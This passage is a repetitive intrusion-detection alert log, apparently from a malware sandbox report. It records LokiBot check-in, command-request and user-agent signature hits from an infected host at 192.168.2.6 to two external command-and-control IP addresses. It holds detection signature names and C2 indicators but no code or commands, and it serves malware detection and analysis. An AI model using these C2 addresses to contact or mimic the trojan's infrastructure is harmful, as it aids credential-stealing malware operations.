                      10/14/21-08:28:31.397798TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.6172.67.219.104
                      10/14/21-08:28:33.672462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.6104.21.62.32
                      10/14/21-08:28:34.890356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.6172.67.219.104
                      10/14/21-08:28:37.119939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.6104.21.62.32
                      10/14/21-08:28:38.386394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.6172.67.219.104
                      10/14/21-08:28:43.873245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.6104.21.62.32
                      10/14/21-08:28:45.343359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.6172.67.219.104
                      10/14/21-08:28:48.039638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.6104.21.62.32
                      10/14/21-08:28:53.563440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.6172.67.219.104
                      10/14/21-08:28:54.645979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.6104.21.62.32
                      10/14/21-08:28:56.080095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.6172.67.219.104
                      10/14/21-08:29:03.076480TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.6104.21.62.32
                      10/14/21-08:29:06.184636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.6172.67.219.104
                      10/14/21-08:29:08.722566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.6104.21.62.32
                      10/14/21-08:29:11.124122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.6172.67.219.104
                      10/14/21-08:29:16.658468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.6104.21.62.32
                      10/14/21-08:29:21.825019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.6172.67.219.104
                      10/14/21-08:29:23.419826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.6104.21.62.32
                      10/14/21-08:29:27.468224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.6172.67.219.104
                      10/14/21-08:29:29.646629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.6104.21.62.32
                      10/14/21-08:29:31.734477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.6172.67.219.104
                      10/14/21-08:29:35.265241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.6104.21.62.32
                      10/14/21-08:29:40.707681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.6172.67.219.104
                      10/14/21-08:29:41.873661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.6104.21.62.32
                      10/14/21-08:29:44.429017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.6172.67.219.104
                      10/14/21-08:29:51.880554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.6104.21.62.32
                      10/14/21-08:29:55.836603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.6172.67.219.104
                      10/14/21-08:29:56.968340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.6104.21.62.32
                      10/14/21-08:29:56.968340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.6104.21.62.32
                      10/14/21-08:29:56.968340TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.6104.21.62.32
                      10/14/21-08:29:56.968340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.6104.21.62.32
                      10/14/21-08:29:59.226831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.6172.67.219.104
                      10/14/21-08:30:00.311329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.6104.21.62.32
